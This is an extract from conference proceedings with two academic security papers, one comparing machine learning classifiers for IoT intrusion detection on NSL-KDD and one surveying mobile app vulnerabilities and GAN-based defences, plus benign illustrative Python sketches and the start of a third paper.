The Internet of Things is considered one of the modern technologies that attract a significant amount of attention among researchers, partly because this technology has become an essential part of most fields, such as the medical, industrial, and agricultural fields. The Internet of Things refers to the ability of objects to communicate with one another via the Internet. Despite the substantial progress in the use of this technology, it still suffers from some problems that hinder its use in sensitive areas; cyberattacks against the Internet of Things are one such problem. Cybersecurity researchers are working on several paths to propose and implement security solutions for IoT networks and the data exchanged via these networks, including Blockchain [1], Cryptography [2], and Intrusion Detection Systems as well [3–5], which are our subject of research. Over the past few years, the Internet of Things has become intertwined with other sciences such as data science, big data, and artificial intelligence. As a result, the search for smarter security solutions, such as solutions based on Machine Learning techniques, becomes a necessity. In this work, we address "Intrusion Detection Systems based on Machine Learning Algorithms" as a solution to increase the security level of the Internet of Things. The rest of this work is organized as follows: Sect. 2 gives a brief overview of the main terms of our research. Then, in Sect. 3, we present the compared algorithms, the comparison parameters, and the dataset used. The experiment, results, and discussion of the comparison are stated in Sect. 4, while the conclusion of our work is presented in Sect. 5.

2 Relevant Terms

In this part, we briefly present the main terms of our work.

2.1 Intrusion Detection System

An Intrusion Detection System (IDS) is a security tool that monitors and analyzes network traffic for suspicious activity and alerts the network administrator when such activity is discovered. There are two categories of IDS:

• Network Intrusion Detection System (NIDS)
This type is used to analyze and monitor network traffic; it can monitor the whole network or be installed in a specific location to monitor part of the network.


• Host Intrusion Detection System (HIDS)
This type refers to a system that monitors and analyzes the computing infrastructure on which it is installed in order to detect an intrusion.

According to the intrusion detection technique, there are two types of IDSs:

• Signature-Based IDS
This type is signature based, i.e., each attack is detected using a pattern (signature) that already exists in an attack signature database [6]. However, it can detect only attacks recognized by their signatures.

• Anomaly-Based IDS
This type is rule based rather than pattern based, i.e., the IDS defines the normal behavior of the monitored system, and therefore any activity that differs from the normal behavior is considered an intrusion [6]. The strong point of this type is its ability to detect new attacks.

2.2 Internet of Things

The Internet of Things refers to the interconnection of objects via the Internet using electronic chips or sensors. Thanks to the concept of the Internet of Things, many objects (and consequently many tasks) can be controlled remotely. Several IoT architectures exist; however, the most common is the three-layer architecture [7, 8]: the perception layer, the network layer, and the application layer.

• The perception layer
It is the physical layer, and its key role is to detect, collect, and process data. This layer contains the sensors by which data are collected.

• The network layer
It is also called the transmission layer. It is the intermediate layer between the perception layer and the application layer, and it is responsible for transmitting data and determining the optimal routes for transmission. This layer contains most network devices, such as hubs, switches, and routers.

• The application layer
It is also known as the business layer. It is the layer that provides services to the users of IoT applications. This is where we can talk about intelligent environments.

2.3 Machine Learning

Machine Learning is an artificial intelligence technology that allows computers to learn without being explicitly programmed. The different machine learning algorithms can be categorized into two major types: supervised learning and unsupervised learning [9].


• Supervised Learning
It is a learning system in which the algorithm generates a function that maps the inputs to the desired outputs. In this type, machines are trained using labeled data; labeled data means that some of the input data is already tagged with the proper output.

• Unsupervised Learning
Together with supervised learning, it is the other fundamental type. In this type, however, the system has only examples but no labels. Unsupervised learning is mainly used in the clustering domain.

3 Preliminary

3.1 The Algorithms Used

• Support Vector Machine Algorithm (SVM)
Support Vector Machine, abbreviated SVM, is a supervised learning model invented by Boser, Guyon, and Vapnik in 1992 at COLT-92 [10]. SVM belongs to the class of linear classifiers that use a linear separation of the data, that is, SVM can solve the classification problem; however, it can also be used to solve another machine learning problem, namely regression. SVM thus addresses two important tasks: the first is identifying the category/class to which a data sample belongs, which is referred to as the classification problem; the second is the prediction of the numerical value of a variable, which is the regression problem. Formally, an SVM is defined by a hyperplane that separates the data into classes. This hyperplane is determined by a number of support vectors, where the support vectors are a subset of the training data that define the boundary between the data classes.

• J48 Algorithm
J48 is a supervised machine learning technique. It goes back to J. Ross Quinlan, who presented the decision tree analysis model; his first algorithm for creating a decision tree is called ID3 (Iterative Dichotomiser 3). The method consists of using a decision tree as a predictive model. Originally, this method was intended to predict a numerical value such as an age, an average, a price, or similar; however, it can also be used to solve the classification problem, that is to say, the prediction of the class to which a data sample belongs. To solve a given problem, J48 uses a tree representation in which each internal node represents an attribute and each leaf node corresponds to a class label.

• Decision Table Algorithm (DT)
Decision Table is a machine learning classification algorithm that makes it easy to model a set of choices. Decision tables are a good way to describe requirements when multiple business rules interact. By using decision tables, it becomes easier for the requirements specialist to write requirements that cover all conditions; with respect to the tester, it becomes easier to write complete test cases.


• Random Forest Algorithm (RF)
Random Forest is a classification algorithm in the field of machine learning. It was first proposed by Ho in 1995 and later by Leo Breiman and Adele Cutler in 2001. Leo Breiman defined this algorithm as follows: "Random forests are a combination of tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest." This algorithm creates a forest with several trees: the more trees, the more robust the forest, and a greater number of trees in the forest provides higher accuracy results.

• Naive Bayes Algorithm (NB)
Naive Bayes is a classification algorithm based on probability theory, and more precisely on Bayes' theorem. It appeared in the 1960s, although not under this name. It is a supervised machine learning algorithm, and it relies on the assumption that the measured features are independent of each other. Mathematically, the NB algorithm, based on Bayes' theorem, is defined by the following relation:

P(c|x) = \frac{P(x|c)\,P(c)}{P(x)}

where P(c|x) is the posterior probability of class c given the attribute x, P(x|c) is the probability of the attribute x knowing that it belongs to class c, P(c) is the prior probability of class c, and P(x) is the prior probability of attribute x.

3.2 The Parameters Used

Before talking about the evaluation parameters, we must first understand the confusion matrix defined below (Table 1). The parameters defined by this matrix are as follows:

TP: normal packet predicted as a normal packet.
FP: normal packet predicted as an abnormal packet.
FN: abnormal packet predicted as a normal packet.
TN: abnormal packet predicted as an abnormal packet.

These parameters allow us to define the evaluation parameters; we use the following four parameters to evaluate our practical work:

• Time
Time is a critical requirement for Internet of Things security solutions, so the learning and testing time of an IDS must be minimal. For this reason, time is taken as a parameter for evaluating the performance of the studied algorithms.


• Accuracy
The ratio between the correctly predicted records and the total number of records, computed by the following relation:

Accuracy = (TP + TN) / (TP + TN + FP + FN)

• Detection Rate

DR = TP / (TP + FN)

• False Alarm Rate

FAR = FP / (FP + TN)
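A small, hedged Python sketch (not part of the paper) showing how these three metrics follow directly from the confusion-matrix counts defined above:

def evaluate(tp, fp, fn, tn):
    # tp: normal predicted as normal, fp: normal predicted as attack,
    # fn: attack predicted as normal, tn: attack predicted as attack
    accuracy = (tp + tn) / (tp + tn + fp + fn)
    detection_rate = tp / (tp + fn)
    false_alarm_rate = fp / (fp + tn)
    return accuracy, detection_rate, false_alarm_rate

# Example with arbitrary illustrative counts (not taken from the experiments):
print(evaluate(tp=9500, fp=40, fn=60, tn=8400))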

3.3 The Dataset Used

In this work, we use the dataset called NSL-KDD, which is derived from another dataset called KDD Cup 99. The abbreviation NSL stands for Network Security Laboratory, and KDD stands for Knowledge Discovery in Databases. KDD Cup 99 is considered the first dataset used in the intrusion detection domain; it was built from the DARPA'98 IDS program database. The main purpose of creating this dataset is to evaluate the different network intrusion detection methods by distinguishing normal connections from abnormal connections, including intrusions, attacks, or malicious activities. NSL-KDD is an upgraded version of KDD Cup 99, created by removing all the redundancies existing in KDD Cup 99. The NSL-KDD dataset contains 41 attributes that can be divided into 4 categories, as Table 2 shows. Regarding attacks, the NSL-KDD dataset contains 24 types of attacks that are themselves divided into 4 categories; Table 3 presents a small description as well as the attack types of each category [11].

4 Experiment

4.1 Experiment Setup

The empirical experiment runs on an Intel Core™ i2 CPU @ 2.40 GHz computer with 4.00 GB RAM running Windows 7. The selected algorithms are tested using the Weka tool. Waikato Environment for Knowledge Analysis, abbreviated Weka, is a machine learning and data mining software written in Java, developed at the University of Waikato in New Zealand [12].
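The experiments reported here were run in Weka; as a hedged illustration only, an equivalent comparison could be scripted in Python with scikit-learn roughly as follows. The CSV path, the binary "label" column, and the assumption that label 1 marks normal traffic are placeholders, and the Decision Table classifier has no direct scikit-learn counterpart.

import time
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier      # rough stand-in for J48 (C4.5)
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix

# Placeholder: a preprocessed NSL-KDD file with numeric features and a 0/1 label,
# where 1 = normal traffic so that tp counts normal->normal, as defined in Sect. 3.2.
data = pd.read_csv("nsl_kdd_preprocessed.csv")
X, y = data.drop(columns=["label"]), data["label"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

models = {"SVM": SVC(), "Random Forest": RandomForestClassifier(),
          "J48-like Decision Tree": DecisionTreeClassifier(), "Naive Bayes": GaussianNB()}

for name, model in models.items():
    start = time.time()
    model.fit(X_train, y_train)
    train_time = time.time() - start
    cm = confusion_matrix(y_test, model.predict(X_test), labels=[1, 0])
    tp, fp = cm[0]   # true normal: predicted normal / predicted attack
    fn, tn = cm[1]   # true attack: predicted normal / predicted attack
    print(f"{name}: time={train_time:.2f}s "
          f"accuracy={(tp + tn) / (tp + tn + fp + fn):.4f} "
          f"DR={tp / (tp + fn):.4f} FAR={fp / (fp + tn):.4f}")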


4.2 Results and Discussion

According to the experiment that we implemented using the machine learning tool Weka, we found the following results:

• Training Time
Table 4 shows the training time of each of the algorithms used (Tables 1, 2 and 3):

Table 1. Confusion matrix

Actual \ Predicted    Normal    Attack
Normal                TP        FP
Attack                FN        TN

Table 2. Features of NSL-KDD Dataset

Basic features (1-9): duration, protocol_type, service, src_bytes, dst_bytes, flag, land, wrong_fragment, urgent
Content features (10-22): hot, num_failed_logins, logged_in, num_compromised, root_shell, su_attempted, num_root, num_file_creations, num_shells, num_access_files, num_outbound_cmds, is_hot_login, is_guest_login
Time-based traffic features (23-31): count, serror_rate, rerror_rate, same_srv_rate, diff_srv_rate, srv_count, srv_serror_rate, srv_rerror_rate, srv_diff_host_rate
Host-based traffic features (32-41): dst_host_count, dst_host_srv_count, dst_host_same_srv_rate, dst_host_diff_srv_rate, dst_host_same_src_port_rate, dst_host_srv_diff_host_rate, dst_host_serror_rate, dst_host_srv_serror_rate, dst_host_rerror_rate, dst_host_srv_rerror_rate


Table 3. Attack categories in the NSL-KDD dataset

DoS – Denial of Service attack: the attacker exhausts computational or memory resources to prevent the target system from handling legitimate requests or to prevent the user from accessing the system.
  Types of attacks: Back, Land, Neptune, Pod, Smurf, Teardrop, Apache2, Udpstorm, Processtable, Worm

U2R – User to Root attack: the attacker first tries to access a normal user account and then exploits one of the vulnerabilities in the system to gain root access.
  Types of attacks: Buffer_overflow, Loadmodule, Rootkit, Perl, Sqlattack, Xterm, Ps

R2L – Remote to Local attack: the attacker can send packets to a victim machine but has no account on the system, and then tries to exploit a vulnerability to gain access as a user of this system.
  Types of attacks: Guess_Password, Ftp_write, Imap, Phf, Multihop, Warezmaster, Warezclient, Spy, Xlock, Xsnoop, Snmpguess, Snmpgetattack, Httptunnel, Sendmail, Named

Probe – the attacker tries to collect information about a network in order to analyze its security vulnerabilities.
  Types of attacks: Satan, Ipsweep, Nmap, Portsweep, Mscan, Saint

Table 4. Training Time

Algorithm        Training Time (seconds)
SVM              2472.46
Random Forest    142.54
Naive Bayes      1.64
J48              45.80
Decision Table   140.87

Figure 1 presents the training time results for each algorithm.

• Accuracy
Table 5 shows the accuracy of each of the algorithms used. Figure 2 presents the accuracy results for each algorithm.


Fig. 1. Training Time

Table 5. Accuracy

Algorithm        Accuracy (%)
SVM              97.50
Random Forest    99.92
Naive Bayes      90.60
J48              99.72
Decision Table   99.49

• Detection Rate
Table 6 shows the detection rate of each of the algorithms used. Figure 3 presents the detection rate results for each algorithm.


Fig. 2. Accuracy

Table 6. Detection rate

Algorithm        Detection rate (%)
SVM              96.76
Random Forest    99.90
Naive Bayes      89.14
J48              99.77
Decision Table   99.29

• False Alarm Rate
Table 7 shows the false alarm rate of each of the algorithms used. Figure 4 presents the false alarm rate results for each algorithm.

In our comparison, from the training-time perspective, Naive Bayes is the fastest to learn, followed by J48, which also has a good training time, whereas SVM is the slowest. In terms of accuracy, Random Forest is the best of the compared algorithms; J48 and Decision Table also achieve good accuracy. In addition, since our comparison is carried out in the context of intrusion detection, and an IDS is efficient only if it has a high detection rate and a low false alarm rate, we notice for these two parameters that Random


Fig. 3. Detection rate

Table 7. False Alarm rate

Algorithm        False Alarm rate (%)
SVM              1.60
Random Forest    0.05
Naive Bayes      7.51
J48              0.34
Decision Table   0.27

Forest, J48, and Decision Table are the best, whereas SVM and Naive Bayes have a lower detection rate and a higher false alarm rate. We can see that Random Forest, J48, and Decision Table are powerful algorithms for intrusion detection, even if the training time of Random Forest and Decision Table is not well optimized, while SVM and Naive Bayes are weaker for intrusion detection in training time as well as in the other parameters. Comparing our work with previous works, Chand et al. [13] present a comparison between SVM and other algorithms for intrusion detection and find that SVM alone is not efficient compared to SVM stacked with other algorithms. The work in [14] shows that J48 is a powerful algorithm for intrusion detection, although its training time is not efficient compared to the other algorithms. In [15], the proposed comparison also shows that Random Forest and J48 give good results in both accuracy and training time.


Fig. 4. False Alarm rate

5 Conclusion

In this work, we presented a practical comparison between machine learning algorithms for intrusion detection using the Weka tool. The results obtained show that the three algorithms Random Forest, J48, and Decision Table are powerful in the context of intrusion detection and can be used in IDS solutions to increase the security of IoT networks.

References 1. Chentouf, F.Z., Bouchkaren, S.: Blockchain for Cybersecurity in IoT (2021) 2. Dhanda, S.S., Singh, B., Jindal, P.: Lightweight Cryptography: A Solution to Secure IoT (2020) 3. Boujrad, M., Lazaar, S., Hassine, M.: Performance Assessment of Open Source IDS for improving IoT Architecture Security implemented on WBANs (2020) 4. Raza, S., Wallgren, L., Voigt, T.: SVELTE: Real-time intrusion detection in the Internet of Things (2013) 5. Wang, H., Gu, J., Wang, S.: An effective intrusion detection framework based on SVM with feature augmentation (2017) 6. Fenanir, S., Semchedine, F., Baadache, A.: A Machine Learning-Based Lightweight Intrusion Detection System for the Internet of Things (2015) 7. Sethi, P., Sarangi, S.R.: Internet of Things: Architectures, Protocols, and Applications (2017) 8. Santos, L., Rabadão, C., Gonçalves, R.: Intrusion Detection Systems in Internet of Things A literature review (2018) 9. Kr. Sharma, R., Kalita, H.K., Borah, P.: Analysis of Machine Learning Techniques Based Intrusion Detection Systems (2016) 10. Evgeniou, T., Pontil, M.: Workshop on Support Vector Machines: Theory and Applications (2001)


11. Dhanabal, L., Shantharajah, S.P.: A Study on NSL-KDD Dataset for Intrusion Detection System Based on Classification Algorithms (2015) 12. Weka Tool. https://www.cs.waikato.ac.nz/ml/weka 13. Chand, N., Mishray, P., Rama Krishna, C., Pilliy, E.S., Govil, M.C.: A Comparative Analysis of SVM and its Stacking with other Classification Algorithm for Intrusion Detection (2016) 14. Nawir, M., Amir, A., Yaakob, N., Lynn, O.B.: Effective and efficient network anomaly detection system using machine learning algorithm (2019) 15. Choudhury, S., Bhowal, A.: Comparative Analysis of Machine Learning Algorithms along with Classifiers for Network Intrusion Detection (2015)

Generative Adversarial Networks for IoT Devices and Mobile Applications Security

Akram Chhaybi1(B), Saiida Lazaar1, and Mohammed Hassine2

1 Mathematics, Computer Sciences and Applications, ERMIA Team, ENSA of Tangier, UAE University-Morocco, Tangier, Morocco
[email protected], [email protected]
2 Tisalabs, Dublin, Ireland
[email protected]

Abstract. With the rise in popularity of Internet of Things (IoT) devices and smartphones, the number of mobile applications (apps) is increasing rapidly, driven by factors such as the low price of smartphones, which contributes significantly to the high acquisition rate, and the ability of consumers to download and install a vast number of applications and tools. However, mobile applications present a whole world of security vulnerabilities, making them a prime target for hackers to spread malware rapidly on smartphones and execute a variety of attacks. Therefore, solutions for detecting and preventing mobile application vulnerabilities are becoming more advanced, based on preventative techniques such as static and dynamic analysis of mobile applications and on effective detection that uses new machine and deep learning models such as Generative Adversarial Networks (GANs), which are well suited to this type of problem. In this work, we discuss the top ten mobile application vulnerabilities, with a focus on the main security challenges facing smartphone apps, and we present some solutions for securing mobile applications based on GANs.

Keywords: Mobile Applications · IoT · GANs · Vulnerabilities · Detection · Prevention · Security

1 Introduction

Mobile phones and the Internet of Things have increasingly merged into all aspects of social life, from financial transactions, email, health monitoring, and social networking to becoming an essential component of people's work and daily lives. As a result, they have radically changed people's productivity and living habits. According to a Statista study [1], the number of smartphone users nearly doubled from 2016 to 2021: in 2016 there were 3.668 billion users, and by the end of 2021 the number reached 6.567 billion users. As a result, the number of threats and vulnerabilities for mobile applications is increasing dramatically; last year alone, there were almost twice as many new varieties of malware infecting mobile


devices as there were in 2019 [2], which can breach communication security, authentication, and integrity, thus giving unauthorized access. Furthermore, many attacks can breach the security system and open backdoors bypassing the defense mechanisms [4]. Comparing smartphone devices, Android has the most significant share of malware, with 47.15 per cent; Android devices had the highest proportion, followed by Windows with 36 per cent, Internet of Things (IoT) devices with 16 per cent, and iPhone with less than 1 per cent [5]. Several reasons have made the Android platform the first target of hackers. First, Android is an open-source operating system, which gives hackers more information about the system and therefore the ability to distribute applications through stores such as the Opera Mobile Store, Panda app, Baidu app store and others. In addition, the personal information that is frequently saved on smartphones can be sensitive, mainly because more people use their cellphones to conduct financial activities such as online banking and shopping that rely on specific data. It may therefore bring in much money for hackers, while most consumers believe that smartphones are just mobile phones with a range of communication and entertainment software pre-installed, not being aware that their cellphones are effectively portable computers that are subject to cyber-attacks [7]. This problem has led to the development of new protection mechanisms for mobile applications, starting with mobile malware detection solutions, which have seen a big wave of improvement through the implementation of machine and deep learning algorithms that help detect malware and protect users [6]. Malicious applications request permissions from users to gain access to contacts, calls, pictures, and any valuable and sensitive data of interest to the attacker; therefore, some solutions use different machine and deep learning technologies to detect malicious applications based on the requested permissions [8]. Our work aims to use Generative Adversarial Networks (GANs) as a solution for protecting mobile applications. This paper is structured as follows: in Sect. 2, we discuss the security challenges and mobile application vulnerabilities. Section 3 describes the proposed solutions that use GANs as a technique to secure mobile applications. We conclude this article with a conclusion and some perspectives for future work.

2 Mobile Applications' Vulnerabilities

In this section, we discuss the main mobile application vulnerabilities and security challenges based on the OWASP Mobile Top 10 [3] and its extension. The OWASP list presented hereafter is devoted to the security of data storage and communications; it also covers confidentiality and authentication issues. A range of challenges threatening the security of mobile apps is reported by many organizations and researchers; one of these foundations is the Open Web Application Security Project (OWASP), which lists every year the main mobile application issues and challenges, helping developers frame their projects within a set of conditions that provide security for the user. Starting with:


– The security of data storage: Development teams create insecure data storage vulnerabilities when they presume that users or malware will not have access to a mobile device's file system and, as a result, to sensitive information in data stores on the device. Access to the file system is simple on mobile phones, so the user or a virus should be expected to investigate sensitive data repositories. This type of issue covers many threats and vulnerabilities that we can summarize into two categories: physical threats and software threats.
– Physical threats: many attacks can gain access to the data stored on the mobile phone, such as the evil maid attack, the cold boot attack and the row hammer attack [5]. Each attack depends on a specific scenario and specific conditions. The software threats are mostly related to malware attacks, and a body of research focuses on detecting malware attacks on mobile phones [6] using different techniques [7].
– Communication security: Network traffic is typically not protected by mobile applications. They may use the SSL/TLS protocols for authentication but not for anything else, and this discrepancy puts data and session IDs in danger of being intercepted. SSL and its successor TLS protect messages from MITM (Man In The Middle) attacks by encrypting network messages; to achieve this goal, it is vital to obtain certificates containing public keys from the server. An MITM attack happens when the attacker interferes with the communication between the client and the server. This can lead to intercepting the message sent by the client and transmitting it to the server; the attacker may also intercept or manipulate messages sent by the server and impersonate the server to connect with the client. Such vulnerabilities can be found through static code analysis of classes like X509TrustManager, HostNameVerifier, WebViewClient sslError and X509HostnameVerifier [8] (a minimal client-side certificate verification example is sketched after this list).
– Insecure authentication: Insecure authentication happens when the system cannot identify the user; once attackers understand the authentication scheme, they try to fake or bypass the authentication requests to the server. There are four authentication approaches: knowledge-based authentication, physiological biometrics-based authentication, behavioral biometrics-based authentication and two/multi-factor authentication [9]. The most used method is knowledge-based authentication, where the user provides a secret sequence of digits or letters to be identified by the system. Whatever the authentication method used, the attacker can find a way to gain access to the user's private information and pass the authentication system using many attacks. The phishing attack is one of them: the attacker sends fake emails, SMS, voice calls and web pages to steal sensitive data [10].
– Weak cryptography: A major problem in mobile apps that use encryption is insufficient cryptography or unsafe cryptography usage. A prospective hacker is able to restore encrypted code or sensitive data to its original unencrypted form due to poor encryption techniques or weaknesses within the encryption process, such as key management or the type of algorithm used in the system. There are various methodologies that the attacker can apply to decrypt the data on the smartphone, for example by decompiling the source code of


the application using specific tools such as JEB Decompiler, IDA Pro, and others for Android phones [11]; they can then find the backup file location and reverse engineer it.
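As a small, hedged illustration of the communication-security point above, the Python snippet below opens a TLS connection with the default SSL context, which verifies the server certificate chain and hostname and therefore rejects a trivial man-in-the-middle; the host name is only an example, and this is not code from the paper.

```python
# Illustrative client-side TLS check: the default SSL context verifies the
# certificate chain and the hostname, which is exactly the behaviour weakened
# by the insecure TrustManager/HostnameVerifier patterns mentioned above.
import socket
import ssl

HOST = "example.com"   # placeholder host for the example

context = ssl.create_default_context()           # CERT_REQUIRED + hostname check
with socket.create_connection((HOST, 443), timeout=5) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=HOST) as tls_sock:
        cert = tls_sock.getpeercert()
        print("Negotiated:", tls_sock.version())
        print("Certificate subject:", cert.get("subject"))
```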

3 Solutions for Protecting Mobile Applications

In this section, we present some technical solutions that can help increase the security of mobile applications at both the hardware and software levels.

3.1 Hardware Level Protections

When we talk about the hardware part, we mean the security of the mobile device itself, which should be considered in case the device is stolen or lost, especially for mobile applications that use sensitive user data to provide their services in healthcare, e-commerce, and any service that requires permissions to access the client's information. In the list below, we discuss the main solutions for improving hardware security on mobile devices.
– Screen Lock Authentication: This is the first step in securing our mobile devices. In general, we can classify mobile screen lock methods into five classes: PIN-based authentication, biometric-based authentication, pattern or gesture-based authentication, graphical password authentication, and other authentication methods [12]. Each of these methods provides a level of security that can be vulnerable under certain conditions. However, there are still users who do not use any of these methods or who use an easy four-digit PIN for authentication. Mobile applications that ask to use clients' sensitive data should force the client to use a suitable screen lock method, for example a biometric method that uses physical or human characteristics to identify a person before granting access to systems, devices or data. This technique can rely on many models to serve the application's needs [13].
– Internal Data Storage: This level of security is essential for applications that store the user's data on the mobile device, such as cookies, images, passwords, and any information that concerns the client. Sensitive data becomes susceptible when it is not correctly protected by the app that keeps it. The software may save data in various locations, including on the device or on an external SD card. Many applications do encrypt the data on mobile phones, but several forensic techniques can extract the encrypted data from mobile devices [14]. Therefore, the application should avoid the internal storage of sensitive data and send the collected data to the cloud using a suitable encryption mechanism that takes into account key management, the energy constraints of small devices and other challenges.
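As a hedged illustration of that last point, encrypting data with a well-vetted authenticated-encryption primitive before it is cached or uploaded could look like the following sketch using the `cryptography` package; key storage and key management are deliberately left out and would need a real design of their own.

```python
# Illustrative only: authenticated encryption of sensitive data before it is
# cached locally or sent to the cloud. Real key management (secure storage,
# rotation, hardware-backed keystores) is out of scope of this sketch.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # in practice: derive/store via a key store
fernet = Fernet(key)

record = b'{"user": "alice", "card_last4": "1234"}'   # hypothetical record
token = fernet.encrypt(record)       # ciphertext with integrity protection
print(token[:30], b"...")

assert fernet.decrypt(token) == record
```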

3.2 Generative Adversarial Networks for Software Level Protection

This section presents Generative Adversarial Networks (GANs) as an important solution for mobile application security. This technology is an unsupervised machine learning approach invented by Ian Goodfellow [15] in 2014 at the Neural Information Processing Systems (NIPS) conference. A GAN consists of two neural networks, one called the generator and the other the discriminator. The role of the generator is to create new data and send it to the discriminator, which verifies whether the data is fake or not, and the process keeps running until the generator can produce data similar to the original. The flowchart in Fig. 1 illustrates the GAN model.

Fig. 1. The GAN flowchart.

The GAN creates new data from a random input and sends it to the discriminator; the discriminator compares the generated data with the real data and uses the result to update the generator. The generator's goal is to train itself to generate fake data that is as similar as possible to the real data, while the discriminator classifies fake and real data as accurately as possible. Moreover, generative adversarial networks can improve the security of smartphones against mobile attacks by combining this technology with multiple techniques such as dynamic and static analyses, signatures, and classifier attacks.
– Dynamic analysis requires analyzing the code during execution, for example by looking at the network traffic, the third parties the application communicates with, and the kernel. Dynamic code analysis can reveal many vulnerabilities such as buffer overflows and null pointers. During static analysis, the source code is reviewed to make sure that the security protections are implemented well [5]. The GAN can use the features extracted from the dynamic


and static analyses to generate new adversarial attacks and use them to test the security of mobile applications.
– We can generate new malware signatures to improve the security of mobile applications against malware. Signatures ensure that the software the user is downloading is authentic, especially for Android smartphones, which hold more than 85% of the market. Signatures are widely used to detect mobile malware because they are easy for researchers to manipulate. The generated signatures are similar to those in the dataset but not identical.
– Classifiers are machine/deep learning models used to classify malware or attacks in general. They use many methods and features to decide whether an application is malware or not. However, they are vulnerable to new attacks because attackers become aware of the classifier and its parameters. The GAN model can also attack the classifiers by creating new adversarial malicious samples that will go undetected by the classifier.
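To make the generator/discriminator loop described above concrete, here is a deliberately small PyTorch sketch trained on random vectors that stand in for application feature vectors; the network sizes, optimizer settings, and the data itself are illustrative assumptions, not a model from the paper.

```python
# Minimal GAN training loop sketch (PyTorch). Random vectors stand in for
# feature vectors extracted from static/dynamic analysis; all sizes are
# illustrative assumptions.
import torch
import torch.nn as nn

FEAT_DIM, NOISE_DIM = 64, 16

generator = nn.Sequential(
    nn.Linear(NOISE_DIM, 128), nn.ReLU(),
    nn.Linear(128, FEAT_DIM))                      # outputs a synthetic feature vector

discriminator = nn.Sequential(
    nn.Linear(FEAT_DIM, 128), nn.LeakyReLU(0.2),
    nn.Linear(128, 1))                             # outputs a real/fake logit

loss_fn = nn.BCEWithLogitsLoss()
opt_g = torch.optim.Adam(generator.parameters(), lr=2e-4)
opt_d = torch.optim.Adam(discriminator.parameters(), lr=2e-4)

real_data = torch.randn(512, FEAT_DIM)             # stand-in for real app features

for step in range(1000):
    real = real_data[torch.randint(0, 512, (32,))]
    noise = torch.randn(32, NOISE_DIM)
    fake = generator(noise)

    # 1) Train the discriminator to separate real from generated samples.
    d_loss = loss_fn(discriminator(real), torch.ones(32, 1)) + \
             loss_fn(discriminator(fake.detach()), torch.zeros(32, 1))
    opt_d.zero_grad(); d_loss.backward(); opt_d.step()

    # 2) Train the generator to fool the (just updated) discriminator.
    g_loss = loss_fn(discriminator(fake), torch.ones(32, 1))
    opt_g.zero_grad(); g_loss.backward(); opt_g.step()
```

The same loop structure applies whether the "real" samples are analysis features, signatures, or malicious traffic traces; only the data preparation changes.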

4 Conclusion and Perspectives

Generative Adversarial Networks (GANs) present great potential to be implemented in a variety of applications to improve the security of mobile applications. In this work, we discussed the top ten mobile application vulnerabilities, focusing on the main security challenges facing smartphone apps. We presented some solutions targeting the security of mobile applications based on Generative Adversarial Networks, starting with dynamic analysis, which involves launching the program, testing it, and finding runtime errors. Static analysis involves examining the code during the development cycle to identify potential flaws throughout both the design and implementation phases, such as permissions, libraries used, etc. Every application in the app store is identified by its unique ID signature, which is used to differentiate it from malware. In order to train GAN models effectively, we propose to use this technique to create new signatures, which can then be used to improve our model. As an outlook for future research, we will focus on implementing GANs in smartphones to resolve security challenges:
– GAN implementation for mobile application security based on battery life and power consumption.
– Comparison of GAN models and their loss functions.
– Lightweight mobile application security solutions based on GANs.

References 1. Smartphone users 2026, Statista. https://www.statista.com/statistics/330695/ number-of-smartphone-users-worldwide. Accessed Nov. 23 2021 2. Chee, K.: Global increase in mobile malware but smartphone security lax in S’pore. The Straits Times, Singapore, Jul. 05, 2021. https://www.straitstimes.com/tech/ tech-news/global-increase-in-mobile-malware-but-smartphone-security-lax-here. Accessed: Nov. 23, 2021


3. OWASP Mobile Top 10. https://owasp.org/www-project-mobile-top-10/. Accessed Nov. 30, 2021 4. Nokia Threat Intelligence Report: Network Security, vol. 2018, no. 12, p. 4, Dec. 2018 10.1016/S1353-4858(18)30122–3 5. Altuwaijri, H., Ghouzali, S.: Android data storage security: a review. J. King Saud Univ. - Comput. Inf. Sci. 32(5), 543–552 (2020). https://doi.org/10.1016/j.jksuci. 2018.07.00 6. Mohamad Arif, J., Ab Razak, M.F., Tuan Mat, S.R., Awang, S., Ismail, N.S.N., Firdaus, A.: Android mobile malware detection using fuzzy AHP. J. Inf. Secur. Appl. 61, 102929 (2021). https://doi.org/10.1016/j.jisa.2021.102929 7. Fereidooni, H., Conti, M., Yao, D., Sperduti, A.: ANASTASIA: ANdroid mAlware detection using STatic analySIs of Applications. In: 2016: Mobility and Security (NTMS), 8th IFIP International Conference on New Technologies 2016, Larnaca, pp. 1–5, Nov. 2016. https://doi.org/10.1109/NTMS.2016.7792435 8. Wang, Y., et al.: Identifying vulnerabilities of SSL/TLS certificate verification in Android apps with static and dynamic analysis. J. Syst. Softw. 167, 110609 (2020). https://doi.org/10.1016/j.jss.2020.110609 9. Wang, C., Wang, Y., Chen, Y., Liu, H., Liu, J.: User authentication on mobile devices: approaches, threats and trends. Comput. Netw. 170, 107118 (2020). https://doi.org/10.1016/j.comnet.2020.107118 10. Goel, D., Jain, A.K.: Mobile phishing attacks and defence mechanisms: State of art and open research challenges. Comput. Secur. 73, 519–544 (2018). https://doi. org/10.1016/j.cose.2017.12.006 11. Park, M., Yi, O., Kim, J.: A methodology for the decryption of encrypted smartphone backup data on android platform: a case study on the latest samsung smartphone backup system. Forensic Sci. Int. Digital Investigation 35, 301026 (2020). https://doi.org/10.1016/j.fsidi.2020.301026 12. Ibrahim, T.M., et al.: Recent advances in mobile touch screen security authentication methods: a systematic literature review. Comput. Secur. 85, 1–24 (2019). https://doi.org/10.1016/j.cose.2019.04.008 13. Abazi, B., Qehaja, B., Hajrizi, E.: Application of biometric models of authentication in mobile equipment. IFAC-PapersOnLine 52(25), 543–546 (2019). https:// doi.org/10.1016/j.ifacol.2019.12.602 14. Fukami, A., Stoykova, R., Geradts, Z.: A new model for forensic data extraction from encrypted mobile devices. Forensic Sci. Int. Digital Investigation 38, 301169 (2021). https://doi.org/10.1016/j.fsidi.2021.301169 15. Goodfellow, I., et al.: Generative Adversarial Nets. Advances in Neural Information Processing Systems, p. 9, 2672–2680

The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM

Youssef Ibnatta1,2(B), Mohammed Khaldoun1,2, and Mohammed Sadik1,2

